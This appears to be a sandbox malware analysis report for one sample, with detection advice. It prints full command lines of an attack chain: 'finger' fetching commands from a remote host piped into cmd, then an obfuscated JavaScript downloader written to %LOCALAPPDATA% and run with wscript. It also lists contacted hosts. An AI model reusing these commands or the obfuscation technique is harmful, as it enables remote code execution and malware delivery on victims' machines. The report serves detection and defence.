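Technical Information
The entries below are sandbox observations for a single sample, listed without their original section labels: processes launched, the file created, hosts contacted (host:port), DNS queries, and the full command lines executed. Read together, the command lines show `finger.exe` retrieving text from the first host over TCP port 79, `more +2` dropping the first two lines of the reply, and the remainder being piped into `cmd`. The later `cmd` invocations strip the filler substrings `q0pZ` and `VQAWS` from environment variables to write `%LOCALAPPDATA%\jDg.js`, a script that references the `.golf` host over HTTP and is then run by `wscript.exe`. The distinctive signals for detection are outbound TCP/79 from a workstation, `finger.exe` output piped into `cmd.exe`, and `wscript.exe` executing a `.js` file freshly written to `%LOCALAPPDATA%`. The connections to `cl###flare.com` and `microsoft.com` are not explained by the visible command lines and should not be treated as indicators on their own.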
- '<SYSTEM32>\finger.exe' ok@t4opw7faa89.devryone.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\jDg.js"
- %LOCALAPPDATA%\jdg.js
- 't4######a89.devryone.buzz':79
- 'v8####.#yghbsqgcxsxu.golf':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 't4######a89.devryone.buzz':79
- 'cl###flare.com':443
- DNS ASK t4######a89.devryone.buzz
- DNS ASK v8####.#yghbsqgcxsxu.golf
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@t4opw7faa89.devryone.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt CGDX=.j&&SEt MSYMV=vq0pZarq0pZ a =q0pZ 'scq0pZriq0pZptq0pZ:'; b =q0pZ 'hq0pZTtPq0pZ:'; Gq0pZetq0pZObjq0pZecq0pZt(q0pZa+b+'&&sET SN5J=VQAWSVQAWSv8oudx.cyghbsqgcxsxu.golfVQAWS?1VQAWS'...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 4ZLY4="%MSYMV:q0pZ=%%SN5J:VQAWS=/%" 0<nul 1>%LOCALAPPDATA%\jDg%CGDX%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\jDg%CGDX%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\jDg.js